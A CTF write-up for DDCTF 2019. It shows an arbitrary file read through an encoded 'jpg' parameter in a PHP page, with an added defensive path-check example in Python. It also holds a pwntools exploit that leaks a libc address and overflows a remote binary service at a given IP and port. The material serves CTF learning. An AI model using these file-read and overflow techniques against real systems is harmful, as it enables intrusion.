DDCTF 2019 WP

web1 滴

Look at the URL: http://117.51.150.246/index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09

Decoding this base64 (twice, then the hex) gives flag.jpg

This is clearly an arbitrary file read.

Try reading index.php:

<?php
/*
* https://blog.csdn.net/FengBanLiuYun/article/details/80616607
* Date: July 4,2018
*/
error_reporting(E_ALL || ~E_NOTICE);

header('content-type:text/html;charset=utf-8');
if(! isset($_GET['jpg']))
header('Refresh:0;url=./index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09');
$file = hex2bin(base64_decode(base64_decode($_GET['jpg'])));
echo '<title>'.$_GET['jpg'].'</title>';
$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
echo $file.'</br>';
$file = str_replace("config","!", $file);
echo $file.'</br>';
$txt = base64_encode(file_get_contents($file));

echo "<img src='data:image/gif;base64,".$txt."'></img>";
/*
* Can you find the flag file?
*
*/

?>

It looks like the str_replace has to be bypassed to read config.php.

Eventually, via the CSDN blog referenced in the comment, I found another article: https://blog.csdn.net/FengBanLiuYun/article/details/80913909

That article mentions the filename .practice.txt.swp

So the file to read in the end is practice.txt.swp ??????????????????????

Reading it gives the flag; wrapped in DDCTF{}: DDCTF{f1ag!ddctf.p}
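As an added illustration (not part of this writeup or the challenge's code), the following Python reproduces how index.php decodes the jpg parameter and contrasts the challenge's regex + str_replace blacklist with the allow-list path check that should have been used instead; the image directory /srv/images and the permitted extension set are assumptions.

```python
import base64
import binascii
import os
import re
from typing import Optional

# Constructed sample: the jpg value from the challenge URL, which index.php
# decodes as base64 -> base64 -> hex before calling file_get_contents().
SAMPLE_PARAM = "TmpZMlF6WXhOamN5UlRaQk56QTJOdz09"

# Assumed allow-list of what an image-serving endpoint should ever return.
IMAGE_EXTENSIONS = {".jpg", ".gif", ".png"}


def decode_jpg_param(param: str) -> str:
    """Reproduce the decoding chain in index.php: base64(base64(hex(name)))."""
    inner = base64.b64decode(param)
    hexname = base64.b64decode(inner)
    return binascii.unhexlify(hexname).decode()


def challenge_filter(name: str) -> str:
    """The blacklist index.php applies: drop everything outside [a-zA-Z0-9.]
    and replace the substring 'config' with '!'. It never confines the path."""
    name = re.sub(r"[^a-zA-Z0-9.]+", "", name)
    return name.replace("config", "!")


def resolve_safely(name: str, image_dir: str) -> Optional[str]:
    """Allow-list alternative: resolve the request inside image_dir and refuse
    anything whose real path escapes it or is not an image file."""
    base = os.path.realpath(image_dir)
    target = os.path.realpath(os.path.join(base, name))
    # commonpath avoids the '/srv/images' vs '/srv/images_old' prefix trap
    if os.path.commonpath([base, target]) != base:
        return None
    if os.path.splitext(target)[1].lower() not in IMAGE_EXTENSIONS:
        return None
    return target


def check_request(param: str, image_dir: str) -> Optional[str]:
    """Decode the parameter exactly as the challenge does, then apply the
    confinement check; returns the path to read or None when rejected."""
    try:
        name = decode_jpg_param(param)
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return resolve_safely(name, image_dir)
```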

pwn

The only pwn challenge in this competition.

# First script: local run against ./xpwn, sending a username, a password
# length of -1 and then 0x4c bytes of 'A'.
from pwn import *

context.log_level = 'debug'
p = process('./xpwn')
p.recv()
p.sendline(b'a')
p.recv()
p.sendline(b'-1')
p.recv()
p.sendline(b'A' * 0x4c)

# Second script: the exploit run against the remote service.
from pwn import *

context.log_level = 'debug'

# p = process('./xpwn')
p = remote('116.85.48.105', 5005)
libc = ELF('./libc.so.6')

# Send 24 bytes as the username, skip the echoed 'A's, and take the 4 bytes
# that follow as a leaked pointer; the fixed offset turns it into the libc base.
p.sendafter('Enter username:', b'AAAA' * 0x6)
p.recvuntil(b'A' * 24)
# print(hex(libc.symbols['_IO_setbuffer']))
# print(hex(u32(addr)))
libc_addr = u32(p.recv(4)) - 0x5f6bb
log.success("libc_addr=" + hex(libc_addr))
# gdb.attach(p)

# Set the password length to -5, then send 17 copies of a libc address
# followed by a terminating null byte as the password.
p.sendlineafter('Please set the length of password:', str(-5))
# payload = p32(libc_addr+0x5f065)*(0x10+1)+b'\x00'
payload = p32(libc_addr + 0x5f065) * 17 + b'\x00'
print(len(payload))
p.sendafter('):', payload)
p.recv()
p.interactive()